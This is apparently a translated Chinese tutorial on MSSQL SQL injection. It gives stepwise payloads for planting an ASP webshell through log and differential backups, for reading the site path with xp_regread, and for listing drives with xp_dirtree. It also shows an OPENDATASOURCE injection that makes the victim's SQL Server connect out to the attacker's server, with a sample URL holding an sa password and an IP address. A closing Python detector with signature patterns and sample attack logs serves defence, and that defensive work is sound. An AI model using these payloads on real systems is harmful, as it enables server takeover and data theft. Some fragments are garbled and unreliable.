Seven steps of the standard log-backup webshell:
1. Injection URL: '; alter database XXX set recovery full-- (switch the database to the Full recovery model so the log is kept)
2. Injection URL: '; create table cmd (a image)-- (create a new cmd table)
3. Injection URL: '; backup log XXX to disk = 'C:\cmd' with init-- (clear out the existing log data so the later backup stays small)
4. Injection URL: '; insert into cmd (a) values (' ... the 16 characters are inserted into the table
5. declare @a sysname,@s nvarchar (4000) select @a=db_name (), @s='C:\Program files\common files\microsoft Shared\Web Server extensions\40\isapi\hsqq.asp' backup database @a to disk = @s with differential,format -- a differential backup of the database, with the backup save path tentatively set to a directory on the C drive and the file name hsqq.asp.
6. drop table [jm_tmp]-- delete the table.
Reading the website's physical path:
1. drop table [jm_tmp];create table [jm_tmp] (value nvarchar (4000) null,data nvarchar (4000) null)-- create the table
2. delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','system\controlset001\services\W3svc\parameters\virtual Roots','/'-- insert the site directory into a table field
3. and (select top 1 cast ([data] as nvarchar (4000)) char (124) from [jm_tmp] order by [data] desc)=0 -- dump the field through the error
4. drop table [jm_tmp]-- delete the table.
Reading a disk directory:
1. drop table [jm_tmp];create table [jm_tmp] (subdirectory nvarchar (+) null,depth tinyint null,[file] bit null)-- create the table
2. delete [jm_tmp];insert [jm_tmp] exec master..xp_dirtree 'C:\',1,1-- insert the folders and files
3. and 1=(select top 1 cast ([subdirectory] as nvarchar (+)) char (124) cast ([file] as nvarchar (1)) char (124) from (select top 1 [subdirectory],[file] from [jm_tmp] order by [file],[subdirectory]) T order by [file] desc,[subdirectory] desc) -- dump the name of the first folder
4. and 1=(select top 1 cast ([subdirectory] as nvarchar (+)) char (124) cast ([file] as nvarchar (1)) char (124) from (select top 2 [subdirectory],[file] from [jm_tmp] order by [file],[subdirectory]) T order by [file] desc,[subdirectory] desc) -- dump the second folder name
5. and 1=(select top 1 cast ([subdirectory] as nvarchar (+)) char (124) cast ([file] as nvarchar (1)) char (124) from (select top X [subdirectory],[file] from [jm_tmp] order by [file],[subdirectory]) T order by [file] desc,[subdirectory] desc) -- dump the Xth folder or file name
6. drop table [jm_tmp]-- delete the table
db_owner permissions during injection, when the web host and the database server are not the same machine
Actually, even when the database and the web server are not on the same machine, there is still a chance; in fact it is more than a chance. When a server is set up, will IIS be installed on it? List the C drive and see whether there is an inetpub directory; if there is, you know IIS is installed. But you don't know its IP. What do you do? One option is to ping the web server and then sweep port 1433 across that C-segment to see which host has it open. That method is not good, though: many hosts now run firewalls, and you cannot sweep port 1433 even when it is open. Instead you can use OPENDATASOURCE to make the other side's SQL Server connect to your own database. Since that connection can be established, you get the IP address of the database server. Let's give it a try. A few prerequisites first: you must have a public IP, and your open port 1433 must be reachable from the external network. With those conditions met, just start.
On the site I'm working on now, the database and the web server are 100% not on the same machine, but I saw an Inetpub folder on the C drive, so this database server has IIS installed. I just can't get its IP. How do I do it? Simple: start with the method described above. Open Query Analyzer and enter: create database hack520; create table zhu (name nvarchar () null); create table J8 (id int null,name nvarchar (n) null); then click Execute.
This creates a database named hack520 and two tables, zhu and J8. zhu has one field, name; J8 has two fields, id and name. OK, now the connection can begin. First look at this SQL statement: insert into OpenDataSource('SQLOLEDB','server=your ip;uid=sql user;pwd=sql password;database=the database you created').database name.table name <statement to execute>. Now let's start.
http://www.xxx.com/news.asp?id=126' Inser ... asource ('SQLOLEDB','server=219.149.xx.182;uid=sa;[email protected]#77169;database=hack520').hack520.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases--
Execute it in IE. At that moment the other side connects to the SQL Server on my machine. Don't believe it? Run netstat -an and look.
Enter this command at the CMD prompt: netstat -an | find "1433"
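As the defender's counterpart to the whole chain above (log-backup webshell, xp_regread path read, xp_dirtree listing and the OPENDATASOURCE outbound link), here is an added example that is not from the original post: it URL-decodes constructed IIS-style request log lines, including double-encoded ones, and tags each line with the techniques it matches. The log format, the sample lines and the tag names are assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the MSSQL injection techniques described above, matched on the
# URL-decoded request. (tag, regex) pairs written for this example.
SIGNATURES = [
    ("recovery_mode_change", re.compile(r"alter\s+database\s+\S+\s+set\s+recovery", re.I)),
    ("backup_to_disk", re.compile(r"backup\s+(log|database)\s+\S+\s+to\s+disk", re.I)),
    ("registry_read", re.compile(r"xp_regread", re.I)),
    ("directory_listing", re.compile(r"xp_dirtree", re.I)),
    ("outbound_sql_link", re.compile(r"opendatasource|openrowset", re.I)),
    ("stacked_query", re.compile(r"'\s*;\s*(create|insert|delete|drop|alter|backup)\b", re.I)),
]

def decode_query(raw, rounds=3):
    """URL-decode up to `rounds` times so double-encoded payloads are normalised too."""
    out = raw
    for _ in range(rounds):
        nxt = unquote_plus(out)
        if nxt == out:
            break
        out = nxt
    return out

def classify(request_line):
    """Return the technique tags (in SIGNATURES order) that match one request line."""
    decoded = decode_query(request_line)
    return [tag for tag, rx in SIGNATURES if rx.search(decoded)]

def scan_log(lines):
    """Return (line_number, tags) for every line matching at least one signature."""
    hits = []
    for n, line in enumerate(lines, start=1):
        tags = classify(line)
        if tags:
            hits.append((n, tags))
    return hits

# Constructed IIS-style log lines (not real traffic; 203.0.113.5 is a documentation address).
SAMPLE_LOG = [
    "2024-01-01 10:00:01 GET /news.asp id=126 200",
    "2024-01-01 10:00:05 GET /news.asp id=126';alter%20database%20site%20set%20recovery%20full-- 200",
    "2024-01-01 10:00:09 GET /news.asp id=126';backup%20log%20site%20to%20disk%3D'C:%5Ccmd'%20with%20init-- 200",
    "2024-01-01 10:00:14 GET /news.asp id=126%2527%253Binsert%2520[jm_tmp]%2520exec%2520master.dbo.xp_regread 500",
    "2024-01-01 10:00:20 GET /news.asp id=126';insert%20[jm_tmp]%20exec%20master..xp_dirtree%20'C:%5C',1,1-- 200",
    "2024-01-01 10:00:31 GET /news.asp id=126';insert%20into%20opendatasource('SQLOLEDB','server=203.0.113.5;"
    "uid=sa;pwd=x;database=hack520').hack520.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases-- 200",
]
```

Running scan_log(SAMPLE_LOG) flags lines 2 to 6, each with the stacked-query tag plus the specific technique; on a real server the same signatures belong in the web log pipeline and, for the backup and xp_* calls, in SQL Server audit or Profiler traces.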